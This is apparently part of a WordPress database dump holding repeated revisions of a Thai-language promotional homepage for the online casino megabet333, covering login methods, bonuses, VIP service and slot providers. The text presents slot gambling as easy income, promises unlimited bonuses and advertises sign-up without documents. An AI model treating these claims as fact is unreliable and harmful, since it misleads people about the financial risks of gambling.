รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p> <h2>megabet333 3 วิธีล็อกอินเว็บสล็อตแตกง่าย อันดับ 1 เปิดเร็วไม่ต้องยื่นเอกสาร</h2> <p>ง่าย ๆ ล็อกกอินเร็ว เปิดยูสกับเราไม่ยาก <b>megabet333 </b>ออกแบบระบบล็อกอินให้ใช้งานสะดวก ปลอดภัย และใช้เวลาไม่ถึงหนึ่งนาที ก็สามารถเริ่มเดิมพันได้ทันทีโดยไม่ต้องส่งเอกสารให้ยุ่งยากเหมือนเว็บทั่วไป สามารถดำเนินการง่าย ๆ แค่ 3 ขั้นตอนเท่านั้น โดยมีขั้นตอนดังต่อไปนี้ </p><ul><li><b>ล็อกอินผ่านเบอร์มือถือ </b>เพียงกรอกเบอร์โทรศัพท์ของคุณ ระบบจะส่งรหัส OTP เพื่อยืนยันตัวตนอย่างรวดเร็ว จากนั้นสามารถตั้งรหัสผ่านและเข้าสู่หน้าเกมได้ทันที เหมาะสำหรับผู้เล่นที่ต้องการความรวดเร็ว ปลอดภัย และไม่อยากจำข้อมูลซับซ้อน</li><li><b>ล็อกอินผ่านบัญชีอีเมลหรือโซเชียลมีเดีย </b>เปิดให้สมาชิกใหม่เชื่อมต่อบัญชีด้วยอีเมล หรือเข้าสู่ระบบผ่าน Facebook, Google หรือ Line ได้โดยตรง เรียกว่าแค่กดครั้งเดียวก็เข้าเล่นได้ทันที ไม่ต้องสมัครซ้ำให้เสียเวลา และยังสามารถใช้ระบบนี้ในทุกอุปกรณ์ทั้งมือถือและคอมพิวเตอร์</li><li><b>ล็อกอินอัตโนมัติผ่านระบบจำเครื่อง </b>สำหรับใครที่เล่นบ่อย ระบบจะจดจำข้อมูลการเข้าล่าสุดไว้แบบเข้ารหัส ปลอดภัยทุกครั้งที่กลับมา ไม่ต้องกรอกข้อมูลใหม่อีก ช่วยให้เริ่มเกมได้ไวกว่าเดิม เหมาะกับสายปั่นสล็อตที่ชอบความรวดเร็วต่อเนื่อง ท่านสามารถเข้าสนุกกับเราได้เลยโดยไม่ต้องเข้าหลาย ๆ รอบ หากเข้าเล่นกับเว็บของเราเป็นประจำเป็นอยู่แล้วก็สามารถเข้าและเริ่มต้นเดิมพันได้เลย </li></ul> <h2>megabet333 โบนัสไม่จำกัด ขนให้รับแบบจัดหนักไม่มีคำว่าอั้นชัวร์</h2> <p>แจกให้จริง ๆ <b>megabet333 </b>ให้คุณรับโบนัสแบบไม่จำกัดได้เลย ขนทั้งความสนุกพร้อมข้อเสนอแบบไม่อั้นรับง่ายชัวร์เต็ม ๆ ขนความคุ้มค่ามาเสิร์ฟให้ผู้เล่นทุกคนแบบไม่มีลิมิต เริ่มตั้งแต่สมัครสมาชิกครั้งแรกก็รับได้ทันทีไม่ต้องลุ้นไม่ต้องรอแอดมินกดยืนยัน เพราะระบบออโต้ของที่นี่พร้อมแจกให้แบบเรียลไทม์เพียงล็อกอินเข้ามาก็มีโบนัสรออยู่ทุกวัน ไม่ว่าจะฝากเท่าไหร่ เล่นกี่รอบ หรืออยู่ในระดับสมาชิกใดก็สามารถเข้าร่วมโปรโมชั่นได้ทั้งหมด ไม่ต้องกลัวว่าจะหมดสิทธิ์หรือถูกจำกัดยอด โบนัสทุกแบบเปิดให้รับซ้ำได้ทุกวัน ทั้งโบนัสต้อนรับ โบนัสฝากรายวัน โบนัสคืนยอดเสีย รวมถึงกิจกรรมพิเศษในเทศกาลต่าง ๆ ที่จัดเต็มของรางวัลมูลค่าสูง ยิ่งเล่นยิ่งสะสมแต้มแลกรางวัลได้จริง ทั้งเครดิตเพิ่มของรางวัลพรีเมียมหรือสิทธิ์เข้าร่วมกิจกรรมพิเศษเฉพาะสมาชิกเท่านั้นเรียกได้ว่าทุกการเล่นของคุณมีค่าทุกวินาที</p> <h2>ดูแลระบบสมาชิกแบบ VIP ทีมงานพร้อมช่วยเหลือ ไม่มีเหวี่ยงแน่นอน </h2> <p>แน่นอนว่าความแตกต่างที่หลายคนอาจไม่รู้ของเว็บที่มีมาตรฐาน ระบบสมาชิก VIP ถูกออกแบบมาเพื่อให้ผู้เล่นได้รับสิทธิพิเศษเหนือใคร ยิ่งเล่นมาก ระดับสมาชิกก็จะสูงขึ้นตามระบบสะสมคะแนน และทุกระดับจะได้รับบริการเฉพาะตัว ไม่ว่าจะเป็นเจ้าหน้าที่ดูแลส่วนตัว โบนัสพิเศษรายเดือน หรือสิทธิ์เข้าร่วมกิจกรรมสุดเอ็กซ์คลูซีฟที่สมาชิกทั่วไปเข้าไม่ได้ อีกทั้งเรายังมีช่องทางติดต่อที่หลากหลาย ทั้งแชทสดในหน้าเว็บ Line Official และระบบช่วยเหลือผ่านแอปพลิเคชัน ทุกช่องทางตอบกลับไวภายในไม่กี่นาที ทีมงานอยู่ประจำตลอด 24 ชั่วโมง เพื่อให้ผู้เล่นมั่นใจได้ว่าไม่มีคำว่าปล่อยปัญหาทิ้งไว้ แม้แต่ผู้เล่นใหม่ที่ยังไม่คุ้นกับระบบก็ไม่ต้องกังวล เพราะทีมงานพร้อมแนะนำทุกขั้นตอน ตั้งแต่การสมัคร การฝากถอน ไปจนถึงการเลือกเกมที่เหมาะสมกับงบของคุณทุกอย่างให้คำตอบอย่างมืออาชีพ</p> <h2>สุดพิเศษ 3 ค่ายเกมน่าลอง กำเงินแค่สิบบาทก็ลุ้นรวยได้เลย</h2> <p>แน่นอนว่าการสร้างรายได้หรือการลงทุนไม่ใช่เรื่องยากอย่างที่คิด เว็บของเรามีพันธมิตรที่จะทำให้ท่านได้เข้าถึงเกมต่าง ๆ ก่อนใคร แถมยังนำเสนอเกมใหม่ ๆ ที่เล่นสนุก แตกง่าย ไม่ต้องใช้เงินลงทุนสูงด้วย โดยมี 3 ค่ายเกมทำเงินที่น่าลุ้นดังต่อไปนี้ </p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:38:50','2025-10-23 08:38:50','',44,'https://megabet333.biz/?p=138',0,'revision','',0),(139,3,'2025-10-23 08:38:50','2025-10-23 08:38:50','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p> <h2>megabet333 3 วิธีล็อกอินเว็บสล็อตแตกง่าย อันดับ 1 เปิดเร็วไม่ต้องยื่นเอกสาร</h2> <p>ง่าย ๆ ล็อกกอินเร็ว เปิดยูสกับเราไม่ยาก <b>megabet333 </b>ออกแบบระบบล็อกอินให้ใช้งานสะดวก ปลอดภัย และใช้เวลาไม่ถึงหนึ่งนาที ก็สามารถเริ่มเดิมพันได้ทันทีโดยไม่ต้องส่งเอกสารให้ยุ่งยากเหมือนเว็บทั่วไป สามารถดำเนินการง่าย ๆ แค่ 3 ขั้นตอนเท่านั้น โดยมีขั้นตอนดังต่อไปนี้ </p><ul><li><b>ล็อกอินผ่านเบอร์มือถือ </b>เพียงกรอกเบอร์โทรศัพท์ของคุณ ระบบจะส่งรหัส OTP เพื่อยืนยันตัวตนอย่างรวดเร็ว จากนั้นสามารถตั้งรหัสผ่านและเข้าสู่หน้าเกมได้ทันที เหมาะสำหรับผู้เล่นที่ต้องการความรวดเร็ว ปลอดภัย และไม่อยากจำข้อมูลซับซ้อน</li><li><b>ล็อกอินผ่านบัญชีอีเมลหรือโซเชียลมีเดีย </b>เปิดให้สมาชิกใหม่เชื่อมต่อบัญชีด้วยอีเมล หรือเข้าสู่ระบบผ่าน Facebook, Google หรือ Line ได้โดยตรง เรียกว่าแค่กดครั้งเดียวก็เข้าเล่นได้ทันที ไม่ต้องสมัครซ้ำให้เสียเวลา และยังสามารถใช้ระบบนี้ในทุกอุปกรณ์ทั้งมือถือและคอมพิวเตอร์</li><li><b>ล็อกอินอัตโนมัติผ่านระบบจำเครื่อง </b>สำหรับใครที่เล่นบ่อย ระบบจะจดจำข้อมูลการเข้าล่าสุดไว้แบบเข้ารหัส ปลอดภัยทุกครั้งที่กลับมา ไม่ต้องกรอกข้อมูลใหม่อีก ช่วยให้เริ่มเกมได้ไวกว่าเดิม เหมาะกับสายปั่นสล็อตที่ชอบความรวดเร็วต่อเนื่อง ท่านสามารถเข้าสนุกกับเราได้เลยโดยไม่ต้องเข้าหลาย ๆ รอบ หากเข้าเล่นกับเว็บของเราเป็นประจำเป็นอยู่แล้วก็สามารถเข้าและเริ่มต้นเดิมพันได้เลย </li></ul> <h2>megabet333 โบนัสไม่จำกัด ขนให้รับแบบจัดหนักไม่มีคำว่าอั้นชัวร์</h2> <p>แจกให้จริง ๆ <b>megabet333 </b>ให้คุณรับโบนัสแบบไม่จำกัดได้เลย ขนทั้งความสนุกพร้อมข้อเสนอแบบไม่อั้นรับง่ายชัวร์เต็ม ๆ ขนความคุ้มค่ามาเสิร์ฟให้ผู้เล่นทุกคนแบบไม่มีลิมิต เริ่มตั้งแต่สมัครสมาชิกครั้งแรกก็รับได้ทันทีไม่ต้องลุ้นไม่ต้องรอแอดมินกดยืนยัน เพราะระบบออโต้ของที่นี่พร้อมแจกให้แบบเรียลไทม์เพียงล็อกอินเข้ามาก็มีโบนัสรออยู่ทุกวัน ไม่ว่าจะฝากเท่าไหร่ เล่นกี่รอบ หรืออยู่ในระดับสมาชิกใดก็สามารถเข้าร่วมโปรโมชั่นได้ทั้งหมด ไม่ต้องกลัวว่าจะหมดสิทธิ์หรือถูกจำกัดยอด โบนัสทุกแบบเปิดให้รับซ้ำได้ทุกวัน ทั้งโบนัสต้อนรับ โบนัสฝากรายวัน โบนัสคืนยอดเสีย รวมถึงกิจกรรมพิเศษในเทศกาลต่าง ๆ ที่จัดเต็มของรางวัลมูลค่าสูง ยิ่งเล่นยิ่งสะสมแต้มแลกรางวัลได้จริง ทั้งเครดิตเพิ่มของรางวัลพรีเมียมหรือสิทธิ์เข้าร่วมกิจกรรมพิเศษเฉพาะสมาชิกเท่านั้นเรียกได้ว่าทุกการเล่นของคุณมีค่าทุกวินาที</p> <h2>ดูแลระบบสมาชิกแบบ VIP ทีมงานพร้อมช่วยเหลือ ไม่มีเหวี่ยงแน่นอน </h2> <p>แน่นอนว่าความแตกต่างที่หลายคนอาจไม่รู้ของเว็บที่มีมาตรฐาน ระบบสมาชิก VIP ถูกออกแบบมาเพื่อให้ผู้เล่นได้รับสิทธิพิเศษเหนือใคร ยิ่งเล่นมาก ระดับสมาชิกก็จะสูงขึ้นตามระบบสะสมคะแนน และทุกระดับจะได้รับบริการเฉพาะตัว ไม่ว่าจะเป็นเจ้าหน้าที่ดูแลส่วนตัว โบนัสพิเศษรายเดือน หรือสิทธิ์เข้าร่วมกิจกรรมสุดเอ็กซ์คลูซีฟที่สมาชิกทั่วไปเข้าไม่ได้ อีกทั้งเรายังมีช่องทางติดต่อที่หลากหลาย ทั้งแชทสดในหน้าเว็บ Line Official และระบบช่วยเหลือผ่านแอปพลิเคชัน ทุกช่องทางตอบกลับไวภายในไม่กี่นาที ทีมงานอยู่ประจำตลอด 24 ชั่วโมง เพื่อให้ผู้เล่นมั่นใจได้ว่าไม่มีคำว่าปล่อยปัญหาทิ้งไว้ แม้แต่ผู้เล่นใหม่ที่ยังไม่คุ้นกับระบบก็ไม่ต้องกังวล เพราะทีมงานพร้อมแนะนำทุกขั้นตอน ตั้งแต่การสมัคร การฝากถอน ไปจนถึงการเลือกเกมที่เหมาะสมกับงบของคุณทุกอย่างให้คำตอบอย่างมืออาชีพ</p> <h2>สุดพิเศษ 3 ค่ายเกมน่าลอง กำเงินแค่สิบบาทก็ลุ้นรวยได้เลย</h2> <p>แน่นอนว่าการสร้างรายได้หรือการลงทุนไม่ใช่เรื่องยากอย่างที่คิด เว็บของเรามีพันธมิตรที่จะทำให้ท่านได้เข้าถึงเกมต่าง ๆ ก่อนใคร แถมยังนำเสนอเกมใหม่ ๆ ที่เล่นสนุก แตกง่าย ไม่ต้องใช้เงินลงทุนสูงด้วย โดยมี 3 ค่ายเกมทำเงินที่น่าลุ้นดังต่อไปนี้ </p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:38:50','2025-10-23 08:38:50','',44,'https://megabet333.biz/?p=139',0,'revision','',0),(140,3,'2025-10-23 08:38:50','2025-10-23 08:38:50','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p> <h2>megabet333 3 วิธีล็อกอินเว็บสล็อตแตกง่าย อันดับ 1 เปิดเร็วไม่ต้องยื่นเอกสาร</h2> <p>ง่าย ๆ ล็อกกอินเร็ว เปิดยูสกับเราไม่ยาก <b>megabet333 </b>ออกแบบระบบล็อกอินให้ใช้งานสะดวก ปลอดภัย และใช้เวลาไม่ถึงหนึ่งนาที ก็สามารถเริ่มเดิมพันได้ทันทีโดยไม่ต้องส่งเอกสารให้ยุ่งยากเหมือนเว็บทั่วไป สามารถดำเนินการง่าย ๆ แค่ 3 ขั้นตอนเท่านั้น โดยมีขั้นตอนดังต่อไปนี้ </p><ul><li><b>ล็อกอินผ่านเบอร์มือถือ </b>เพียงกรอกเบอร์โทรศัพท์ของคุณ ระบบจะส่งรหัส OTP เพื่อยืนยันตัวตนอย่างรวดเร็ว จากนั้นสามารถตั้งรหัสผ่านและเข้าสู่หน้าเกมได้ทันที เหมาะสำหรับผู้เล่นที่ต้องการความรวดเร็ว ปลอดภัย และไม่อยากจำข้อมูลซับซ้อน</li><li><b>ล็อกอินผ่านบัญชีอีเมลหรือโซเชียลมีเดีย </b>เปิดให้สมาชิกใหม่เชื่อมต่อบัญชีด้วยอีเมล หรือเข้าสู่ระบบผ่าน Facebook, Google หรือ Line ได้โดยตรง เรียกว่าแค่กดครั้งเดียวก็เข้าเล่นได้ทันที ไม่ต้องสมัครซ้ำให้เสียเวลา และยังสามารถใช้ระบบนี้ในทุกอุปกรณ์ทั้งมือถือและคอมพิวเตอร์</li><li><b>ล็อกอินอัตโนมัติผ่านระบบจำเครื่อง </b>สำหรับใครที่เล่นบ่อย ระบบจะจดจำข้อมูลการเข้าล่าสุดไว้แบบเข้ารหัส ปลอดภัยทุกครั้งที่กลับมา ไม่ต้องกรอกข้อมูลใหม่อีก ช่วยให้เริ่มเกมได้ไวกว่าเดิม เหมาะกับสายปั่นสล็อตที่ชอบความรวดเร็วต่อเนื่อง ท่านสามารถเข้าสนุกกับเราได้เลยโดยไม่ต้องเข้าหลาย ๆ รอบ หากเข้าเล่นกับเว็บของเราเป็นประจำเป็นอยู่แล้วก็สามารถเข้าและเริ่มต้นเดิมพันได้เลย </li></ul> <img width=\"800\" height=\"334\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-1024x427.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-768x320.webp 768w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp 1200w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h2>megabet333 โบนัสไม่จำกัด ขนให้รับแบบจัดหนักไม่มีคำว่าอั้นชัวร์</h2> <p>แจกให้จริง ๆ <b>megabet333 </b>ให้คุณรับโบนัสแบบไม่จำกัดได้เลย ขนทั้งความสนุกพร้อมข้อเสนอแบบไม่อั้นรับง่ายชัวร์เต็ม ๆ ขนความคุ้มค่ามาเสิร์ฟให้ผู้เล่นทุกคนแบบไม่มีลิมิต เริ่มตั้งแต่สมัครสมาชิกครั้งแรกก็รับได้ทันทีไม่ต้องลุ้นไม่ต้องรอแอดมินกดยืนยัน เพราะระบบออโต้ของที่นี่พร้อมแจกให้แบบเรียลไทม์เพียงล็อกอินเข้ามาก็มีโบนัสรออยู่ทุกวัน ไม่ว่าจะฝากเท่าไหร่ เล่นกี่รอบ หรืออยู่ในระดับสมาชิกใดก็สามารถเข้าร่วมโปรโมชั่นได้ทั้งหมด ไม่ต้องกลัวว่าจะหมดสิทธิ์หรือถูกจำกัดยอด โบนัสทุกแบบเปิดให้รับซ้ำได้ทุกวัน ทั้งโบนัสต้อนรับ โบนัสฝากรายวัน โบนัสคืนยอดเสีย รวมถึงกิจกรรมพิเศษในเทศกาลต่าง ๆ ที่จัดเต็มของรางวัลมูลค่าสูง ยิ่งเล่นยิ่งสะสมแต้มแลกรางวัลได้จริง ทั้งเครดิตเพิ่มของรางวัลพรีเมียมหรือสิทธิ์เข้าร่วมกิจกรรมพิเศษเฉพาะสมาชิกเท่านั้นเรียกได้ว่าทุกการเล่นของคุณมีค่าทุกวินาที</p> <h2>ดูแลระบบสมาชิกแบบ VIP ทีมงานพร้อมช่วยเหลือ ไม่มีเหวี่ยงแน่นอน </h2> <p>แน่นอนว่าความแตกต่างที่หลายคนอาจไม่รู้ของเว็บที่มีมาตรฐาน ระบบสมาชิก VIP ถูกออกแบบมาเพื่อให้ผู้เล่นได้รับสิทธิพิเศษเหนือใคร ยิ่งเล่นมาก ระดับสมาชิกก็จะสูงขึ้นตามระบบสะสมคะแนน และทุกระดับจะได้รับบริการเฉพาะตัว ไม่ว่าจะเป็นเจ้าหน้าที่ดูแลส่วนตัว โบนัสพิเศษรายเดือน หรือสิทธิ์เข้าร่วมกิจกรรมสุดเอ็กซ์คลูซีฟที่สมาชิกทั่วไปเข้าไม่ได้ อีกทั้งเรายังมีช่องทางติดต่อที่หลากหลาย ทั้งแชทสดในหน้าเว็บ Line Official และระบบช่วยเหลือผ่านแอปพลิเคชัน ทุกช่องทางตอบกลับไวภายในไม่กี่นาที ทีมงานอยู่ประจำตลอด 24 ชั่วโมง เพื่อให้ผู้เล่นมั่นใจได้ว่าไม่มีคำว่าปล่อยปัญหาทิ้งไว้ แม้แต่ผู้เล่นใหม่ที่ยังไม่คุ้นกับระบบก็ไม่ต้องกังวล เพราะทีมงานพร้อมแนะนำทุกขั้นตอน ตั้งแต่การสมัคร การฝากถอน ไปจนถึงการเลือกเกมที่เหมาะสมกับงบของคุณทุกอย่างให้คำตอบอย่างมืออาชีพ</p> <h2>สุดพิเศษ 3 ค่ายเกมน่าลอง กำเงินแค่สิบบาทก็ลุ้นรวยได้เลย</h2> <p>แน่นอนว่าการสร้างรายได้หรือการลงทุนไม่ใช่เรื่องยากอย่างที่คิด เว็บของเรามีพันธมิตรที่จะทำให้ท่านได้เข้าถึงเกมต่าง ๆ ก่อนใคร แถมยังนำเสนอเกมใหม่ ๆ ที่เล่นสนุก แตกง่าย ไม่ต้องใช้เงินลงทุนสูงด้วย โดยมี 3 ค่ายเกมทำเงินที่น่าลุ้นดังต่อไปนี้ </p><h3><b>PG Slot</b></h3><p>ค่ายเกมที่ใคร ๆ ก็พูดถึงในวงการเว็บสล็อตคาสิโนต้องยกให้ pg Slot เพราะขึ้นชื่อเรื่องภาพกราฟิกสวย เพลงประกอบเร้าใจ และฟีเจอร์โบนัสที่ไม่เหมือนใคร เกมทุกเกมจากค่ายนี้ถูกออกแบบให้เล่นง่าย แต่มีรายละเอียดลึกสำหรับคนที่ชอบวางกลยุทธ์ในการหมุนสล็อต จุดเด่นของ pg Slot คือ ระบบเกมที่ลื่นไหลรองรับทุกอุปกรณ์ ทั้งมือถือและคอมพิวเตอร์ โดยไม่ต้องดาวน์โหลดแอปพลิเคชันให้ยุ่งยาก นอกจากนี้ยังมีเกมใหม่อัปเดตทุกเดือน เช่น Mahjong Ways, Lucky Neko, หรือ Treasures of Aztec ที่การันตีความฮอตทุกงวด โบนัสแตกหนักแทบทุกสปิน ใครที่ชอบแนวเกมกราฟิกแฟนตาซี หรือสายมินิมอลเล่นเพลิน ๆ รับรองว่า pg Slot คือคำตอบที่ทำให้คุณติดใจตั้งแต่ครั้งแรกที่หมุนแน่นอน</p><h3><b>XO Slot</b></h3><p>อีกหนึ่งตำนานแห่งวงการเกมสล็อตที่คอเกมรุ่นเก๋ายังพูดถึงไม่ขาดปากก็คือ XO Slot ค่ายเกมสุดคลาสสิกที่ครองใจนักเดิมพันมานาน จุดเด่นคือเล่นง่าย โบนัสเข้าบ่อย และยังคงเสน่ห์ของสล็อตในรูปแบบดั้งเดิมไว้ครบถ้วน เกมของ XO Slot ถูกออกแบบมาให้เหมาะกับทั้งมือใหม่และมืออาชีพ เพราะไม่ต้องใช้ทุนเยอะก็สามารถลุ้นรางวัลใหญ่ได้ มีระบบแจ็กพอตสุ่มที่แตกบ่อยจนถูกเรียกว่า “ค่ายสล็อตสายโชค” ไม่ว่าจะเป็นเกมฮิตอย่าง Roma, Supreme Caishen หรือ Lucky Panda ทุกเกมมีเอกลักษณ์เฉพาะตัว ทั้งภาพ เสียง และอัตราจ่ายที่คุ้มค่า เหมาะกับคนที่ชอบเล่นสล็อตแนวเรียบง่ายแต่ให้ผลตอบแทนเกินคาด เล่นเพลินแตกบ่อย ต้อง XO Slot เท่านั้น</p><h3><b>Joker Slot</b></h3><p>ถ้าพูดถึงค่ายที่รวมเกมสล็อตคาสิโนสุดมันส์ แตกแรง จัดเต็มทุกแนว ต้องไม่พลาด โจ๊กเกอร์สล็อต หรือ Joker Gaming ที่ขึ้นชื่อเรื่องโบนัสก้อนใหญ่และเกมคุณภาพระดับสากล ความพิเศษของค่ายนี้คือระบบเกมเสถียร เล่นได้ต่อเนื่องไม่มีสะดุด พร้อมด้วยฟีเจอร์ซื้อฟรีสปินสุดคุ้มที่ทำให้ผู้เล่นมีโอกาสคว้ารางวัลใหญ่โดยไม่ต้องรอนาน เกมยอดนิยมของค่ายนี้ เช่น Roma X, Queen 2, และ Joker Madness ล้วนมีรูปแบบการเล่นที่เข้าใจง่าย และโบนัสแตกไวเกินต้าน จุดเด่นอีกอย่างคือการรองรับระบบภาษาไทยเต็มรูปแบบ พร้อมโหมดทดลองเล่นฟรีสำหรับมือใหม่ ใครที่อยากสัมผัสความตื่นเต้นของเกมที่ทั้งดุดันและแจกจริง โจ๊กเกอร์สล็อตคือค่ายที่ไม่ควรพลาด เพราะที่นี่ไม่ใช่แค่เล่นเพื่อความสนุก แต่ยังเป็นแหล่งสร้างรายได้ที่คุ้มค่าทุกการสปินจริง ๆ</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2025-10-23 08:38:50','2025-10-23 08:38:50','',44,'https://megabet333.biz/?p=140',0,'revision','',0),(141,3,'2025-10-23 08:40:13','2025-10-23 08:40:13','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <b>megabet333 </b>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p> <h2>megabet333 3 วิธีล็อกอินเว็บสล็อตแตกง่าย อันดับ 1 เปิดเร็วไม่ต้องยื่นเอกสาร</h2> <p>ง่าย ๆ ล็อกกอินเร็ว เปิดยูสกับเราไม่ยาก <b>megabet333 